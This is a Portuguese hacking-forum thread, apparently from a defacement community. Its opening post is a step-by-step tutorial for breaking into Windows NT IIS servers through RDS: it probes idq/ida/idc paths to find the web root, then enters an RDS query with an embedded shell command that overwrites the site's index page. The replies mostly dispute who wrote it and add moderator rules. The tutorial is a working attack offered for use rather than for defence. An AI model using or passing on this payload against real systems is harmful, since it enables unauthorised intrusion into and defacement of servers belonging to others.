Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invadir servidor por RDS

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Invadir servidor por RDS

    Introducão
    Antes de tudo quero avisar que esta técnica só funciona se o servidor usar Windows NT, este tutorial e redirecionado aos que tem conhecimentos intemediarios e toda a autoria dele e minha.

    Tutorial
    Primeiramente vamos procurar a página que se encontra a index ou a default, na maioria dos casos só precisa digitar:
    wwww.servidor.com/idq.idq
    Que aparece o diretorio, o mais comum é o InetPubwwwroot.

    Agora vamos descobrir se o servidor usa index.asp, index.html ou index.htm, isso conta também se for default.
    Para isso digite na URL:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    ou
    ida.ida
    ou
    idc.idc
    Você vai encontrar o diretorio como dito anteriormente, agora vamos a descoberta proposta acima.
    Você só encontra ela fazendo testes assim:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... possiveis
    ou
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... possiveis
    Vamos supor que o diretório é c:inetpubwwwrootindex.htm, então é so entrar na tela do RDS assim:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apague tudo que estiver escrito e digite:
    Select * from Products where ProductType='|shell("cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm")|'
    Agora é so apertar RUN que o servidor estará invadido.

    Créditos: 'G33K~
    Similar Threads

  • Font Size
    #2
    Muito bacana, gostei está de parabens.
    Abraços



    SEMPRE PENSE O QUE IRAR DIZER PARA NÃO LEVAR UM BRUTALITY.
    "Quem fala de MIM na minha ausência respeita MINHA presença"

    Comment


    • Font Size
      #3
      Este artigo não pode ser seu, tira os créditos e indica de onde copiou.

      Veja o resultado das minhas pesquisas.

      8 jan. 2010 13:37:25 GMT - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      15 fev. 2010 14:21:11 GMT - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      26 fev. 2010 05:20:48 GMT - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      09 mar. 2010 20:42:18 GMT - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

      Com esta pequena resalva, considero pertinente ou teu post.

      Comment


      • Font Size
        #4
        Se voce não percebeu pode ter este conteúdo em vários locais mas quem escreveu este fui eu

        Comment


        • Font Size
          #5
          Acredito que não me expressei muito antes por isto vou tentar ser mais claro.

          Quando você fala na Introducão

          Antes de tudo quero avisar que esta técnica só funciona se o servidor usar Windows NT, este tutorial e redirecionado aos que tem conhecimentos intemediarios e toda a autoria dele e minha.
          Quando eu fiz menção de ser copia, quis dizer, que você não foi o autor da descoberta (falha). Por este motivo solicitei que você indica as fontes da pesquisa.

          Comment


          • Font Size
            #6
            Ahn, isso ai e verdade
            Eu coloquei que ele é de todo autoria minha pois eu quis dizer no sentido de escrita ...
            Mas vamos parar com essa discursão pois vai gerar Flood.

            Comment


            • Font Size
              #7
              09 Abr 2009. 15:04:17 Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
              27/5/2009, 7:22 pm: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

              Parabens, você rippou um tópico e falou que os créditos são seus. (Assim como eu tinha dito no dia da postagem)
              sigpic

              Comment


              • Font Size
                #8
                O G33K está certo, os créditos do tutorial são dele mas a técnica não foi descoberta por ele ...

                Comment


                • Font Size
                  #9
                  - Vou dizer uma coisa bem séria aqui ; da proxima vez que eu ver comentario do tipo que havia aqui vocês vao ser punidos.
                  - Leiam as Regras do fórum Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... .

                  Termos de Uso
                  É proibido:
                  01. É proibido fazer ofensas a qualquer tipo de pessoa presente no Fórum.
                  06. É proibido o uso de palavrão, ofensa, palavras de baixo calão e xingamentos, nos comentários dos tópicos, chat e entre quaisquer membros do fórum sujeito a Alertas ou Banimento.

                  Ok ? Abraço.
                  Nao Participa ainda ?
                  * Comunidade Elite Defacer


                  Elite Defacer
                  Hackeralp - 5ubZer0 - $cr34m()

                  Comment


                  • Font Size
                    #10
                    Pelo menos alguém me apoia ..

                    Comment


                    • Font Size
                      #11
                      oque é RDS?

                      Comment


                      • Font Size
                        #12
                        otimo post
                        nao ligue para as criticas tenho certeza que 90% dos mebros tao nem ai pra quen descobriu a tecnica
                        tao atras e de conhecimento e ate quen criou tanben

                        Comment

                        X
                        Working...
                        X